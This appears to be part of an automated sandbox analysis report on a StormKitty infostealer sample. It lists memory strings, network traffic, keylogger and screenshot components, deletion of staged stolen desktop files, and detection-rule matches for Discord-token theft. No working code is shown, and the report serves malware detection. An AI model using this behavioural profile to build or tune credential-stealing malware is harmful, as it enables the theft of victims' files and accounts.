                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://m.soundcloud.com/
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://m.vk.com/
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
                Source: Cookies.15.drString found in binary or memory: https://msn.comXID/
                Source: Cookies.15.drString found in binary or memory: https://msn.comXIDv10
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://music.amazon.com
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://music.apple.com
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://music.yandex.com
                Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://ntp.msn.cn/edge/ntp
                Source: 000003.log2.14.drString found in binary or memory: https://ntp.msn.com
                Source: 000003.log.14.dr, 000003.log3.14.drString found in binary or memory: https://ntp.msn.com/
                Source: 000003.log.14.drString found in binary or memory: https://ntp.msn.com/0
                Source: QuotaManager.14.drString found in binary or memory: https://ntp.msn.com/_default
                Source: 000003.log.14.dr, 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://ntp.msn.com/edge/ntp
                Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
                Source: Session_13380890359322764.14.drString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
                Source: QuotaManager.14.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
                Source: 2cc80dabc69f58b6_0.14.drString found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://open.spotify.com
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://outlook.live.com/mail/0/
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://outlook.office.com/mail/0/
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
                Source: chromecache_590.8.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
                Source: chromecache_593.8.drString found in binary or memory: https://plus.google.com
                Source: chromecache_593.8.drString found in binary or memory: https://plus.googleapis.com
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
                Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://sb.scorecardresearch.com/
                Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://srtb.msn.cn/
                Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://srtb.msn.com/
                Source: tmp6E3A.tmp.dat.2.drString found in binary or memory: https://support.mozilla.org
                Source: tmp6E3A.tmp.dat.2.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: tmp6E3A.tmp.dat.2.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                Source: bc7EKCf.exe, 00000002.00000002.1985383738.000000000424B000.00000004.00000800.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.1985383738.0000000004224000.00000004.00000800.00020000.00000000.sdmp, tmp478F.tmp.dat.2.dr, tmp477E.tmp.dat.2.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: bc7EKCf.exe, 00000002.00000002.1985383738.0000000004226000.00000004.00000800.00020000.00000000.sdmp, tmp478F.tmp.dat.2.dr, tmp477E.tmp.dat.2.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: bc7EKCf.exe, 00000002.00000002.1985383738.000000000424B000.00000004.00000800.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.1985383738.0000000004224000.00000004.00000800.00020000.00000000.sdmp, tmp478F.tmp.dat.2.dr, tmp477E.tmp.dat.2.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: bc7EKCf.exe, 00000002.00000002.1985383738.0000000004226000.00000004.00000800.00020000.00000000.sdmp, tmp478F.tmp.dat.2.dr, tmp477E.tmp.dat.2.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://tidal.com/
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://twitter.com/
                Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.14.drString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
                Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.14.drString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
                Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.14.drString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://vibe.naver.com/today
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://web.telegram.org/
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://web.whatsapp.com
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://word.new?from=EdgeM365Shoreline
                Source: chromecache_593.8.drString found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://www.deezer.com/
                Source: tmp473E.tmp.dat.2.dr, tmp470E.tmp.dat.2.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: content_new.js.14.dr, content.js.14.drString found in binary or memory: https://www.google.com/chrome
                Source: tmp473E.tmp.dat.2.dr, tmp470E.tmp.dat.2.dr, tmpF945.tmp.dat.2.dr, Web Data.14.dr, tmpF934.tmp.dat.2.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: 23be4805-ca70-4593-b6ee-9bc67407429b.tmp.15.drString found in binary or memory: https://www.googleapis.com
                Source: chromecache_593.8.drString found in binary or memory: https://www.googleapis.com/auth/plus.me
                Source: chromecache_593.8.drString found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
                Source: chromecache_590.8.drString found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
                Source: chromecache_590.8.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
                Source: chromecache_590.8.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://www.iheart.com/podcast/
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://www.instagram.com
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://www.last.fm/
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://www.messenger.com
                Source: tmp6E3A.tmp.dat.2.drString found in binary or memory: https://www.mozilla.org
                Source: tmp6E3A.tmp.dat.2.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: tmp6E3A.tmp.dat.2.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.00000000031DC000.00000004.00000800.00020000.00000000.sdmp, History.txt.2.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                Source: bc7EKCf.exe, 00000002.00000002.1985383738.0000000004293000.00000004.00000800.00020000.00000000.sdmp, tmp6EF8.tmp.dat.2.dr, tmp6E3A.tmp.dat.2.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.00000000031DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/t-
                Source: tmp6E3A.tmp.dat.2.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: bc7EKCf.exe, 00000002.00000002.1985383738.0000000004293000.00000004.00000800.00020000.00000000.sdmp, tmp6EF8.tmp.dat.2.dr, tmp6E3A.tmp.dat.2.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://www.msn.com/web-notification-icon-light.png
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
                Source: bc7EKCf.exe, 00000002.00000002.2005165287.00000000077A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                Source: bc7EKCf.exe, 00000002.00000002.2005165287.00000000077A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                Source: bc7EKCf.exe, 00000002.00000002.2005165287.00000000077A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://www.office.com
                Source: Top Sites.14.drString found in binary or memory: https://www.office.com/
                Source: Top Sites.14.drString found in binary or memory: https://www.office.com/Office
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://www.tiktok.com/
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://www.youtube.com
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://y.music.163.com/m/
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 60915 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60920 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60891
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60890
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 60886 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60849 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60927 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60904
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60860
                Source: unknownNetwork traffic detected: HTTP traffic on port 60916 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60887 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60917
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60916
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60915
                Source: unknownNetwork traffic detected: HTTP traffic on port 60879 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60890 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60922 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60917 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60880 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60914
                Source: unknownNetwork traffic detected: HTTP traffic on port 60926 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60879
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60878
                Source: unknownNetwork traffic detected: HTTP traffic on port 60888 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60884 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60927
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60849
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60926
                Source: unknownNetwork traffic detected: HTTP traffic on port 60914 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60891 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 61099 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60878 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60884
                Source: unknownNetwork traffic detected: HTTP traffic on port 60860 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60921 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60880
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61099
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60889
                Source: unknownNetwork traffic detected: HTTP traffic on port 60904 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60922
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60888
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60921
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60887
                Source: unknownNetwork traffic detected: HTTP traffic on port 60889 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60920
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60886
                Source: unknownNetwork traffic detected: HTTP traffic on port 60885 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60885
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49735 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: 0.2.bc7EKCf.exe.4ce1eb0.3.raw.unpack, DesktopScreenshot.cs.Net Code: Make
                Source: 0.2.bc7EKCf.exe.4ce1eb0.3.raw.unpack, Keylogger.cs.Net Code: SetHook
                Source: 0.2.bc7EKCf.exe.4ce1eb0.3.raw.unpack, Keylogger.cs.Net Code: KeyboardLayout

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Source: C:\Users\user\Desktop\bc7EKCf.exeFile deleted: C:\Users\user\AppData\Local\66e2c348b6a124791b4c494163efaaeb\user@618321_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU.pdfJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeFile deleted: C:\Users\user\AppData\Local\66e2c348b6a124791b4c494163efaaeb\user@618321_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XZXHAVGRAG.docxJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeFile deleted: C:\Users\user\AppData\Local\66e2c348b6a124791b4c494163efaaeb\user@618321_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ.jpgJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeFile deleted: C:\Users\user\AppData\Local\66e2c348b6a124791b4c494163efaaeb\user@618321_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\KATAXZVCPS.xlsxJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeFile deleted: C:\Users\user\AppData\Local\66e2c348b6a124791b4c494163efaaeb\user@618321_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\KATAXZVCPS.xlsxJump to behavior

                System Summary

                barindex
                Source: 0.2.bc7EKCf.exe.4ce1eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
                Source: 0.2.bc7EKCf.exe.4ce1eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                Source: 0.2.bc7EKCf.exe.4ce1eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                Source: 2.2.bc7EKCf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
                Source: 2.2.bc7EKCf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                Source: 2.2.bc7EKCf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                Source: 0.2.bc7EKCf.exe.4ce1eb0.3.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
                Source: 0.2.bc7EKCf.exe.4ce1eb0.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                Source: 0.2.bc7EKCf.exe.4ce1eb0.3.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                Source: 00000000.00000002.1799849511.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                Source: 00000000.00000002.1799849511.0000000004AE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                Source: 00000002.00000002.1967670466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                Source: 00000000.00000002.1819411564.00000000094C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                Source: Process Memory Space: bc7EKCf.exe PID: 7272, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 0_2_02F7CBB40_2_02F7CBB4
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 0_2_02F7F4380_2_02F7F438
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 0_2_02F7F42A0_2_02F7F42A
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 0_2_0777C6A30_2_0777C6A3
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 0_2_077792A00_2_077792A0
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 0_2_077760400_2_07776040
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 0_2_077730180_2_07773018
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 0_2_0777A6410_2_0777A641
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 0_2_07C31F400_2_07C31F40
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 0_2_07C3EE500_2_07C3EE50
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 0_2_07C33D000_2_07C33D00
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_015973E02_2_015973E0
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_015939182_2_01593918
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_01597CB02_2_01597CB0
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_015931E72_2_015931E7
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_015931882_2_01593188
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_015970982_2_01597098
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_015932682_2_01593268
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_06FC27282_2_06FC2728
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_06FC52A12_2_06FC52A1
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_06FC27C72_2_06FC27C7
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_076443482_2_07644348
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_07649BAA2_2_07649BAA
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_07649BB82_2_07649BB8
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_076E61882_2_076E6188
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_076E61982_2_076E6198
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_076E00402_2_076E0040
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_076E00062_2_076E0006
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_07955E682_2_07955E68
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_07955E582_2_07955E58
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_07959C902_2_07959C90
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_0796AA312_2_0796AA31
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_0796A8D02_2_0796A8D0
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_07E3A7082_2_07E3A708
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_08ADB3B02_2_08ADB3B0
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_08ADE6502_2_08ADE650
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_08B3D8802_2_08B3D880
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_08B391E82_2_08B391E8
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_08B309D02_2_08B309D0
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_08B392F82_2_08B392F8
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_08B313D82_2_08B313D8
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_08B367382_2_08B36738
                Source: C:\Users\user\Desktop\bc7EKCf.exeCode function: 2_2_08B337382_2_08B33738
                Source: bc7EKCf.exe, 00000000.00000002.1756488186.0000000003132000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamestub.exe0 vs bc7EKCf.exe
                Source: bc7EKCf.exe, 00000000.00000002.1756488186.0000000003649000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamestub.exe0 vs bc7EKCf.exe
                Source: bc7EKCf.exe, 00000000.00000002.1755604822.000000000128E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs bc7EKCf.exe
                Source: bc7EKCf.exe, 00000000.00000002.1799849511.0000000004AE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamestub.exe0 vs bc7EKCf.exe
                Source: bc7EKCf.exe, 00000002.00000002.1985383738.00000000041F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameICSharpCode.SharpZipLib.dll8 vs bc7EKCf.exe
                Source: bc7EKCf.exe, 00000002.00000002.1996132099.0000000005D51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs bc7EKCf.exe
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.00000000031DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameICSharpCode.SharpZipLib.dll8 vs bc7EKCf.exe
                Source: bc7EKCf.exe, 00000002.00000002.1995301685.00000000056E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNito.Disposables.dllB vs bc7EKCf.exe
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.000000000368C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Text.Json.dll@ vs bc7EKCf.exe
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.000000000368C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.Tasks.Extensions.dllT vs bc7EKCf.exe
                Source: bc7EKCf.exe, 00000002.00000002.2008803844.0000000007E50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.CompilerServices.Unsafe.dll@ vs bc7EKCf.exe
                Source: bc7EKCf.exe, 00000002.00000002.1967670466.0000000000690000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamestub.exe0 vs bc7EKCf.exe
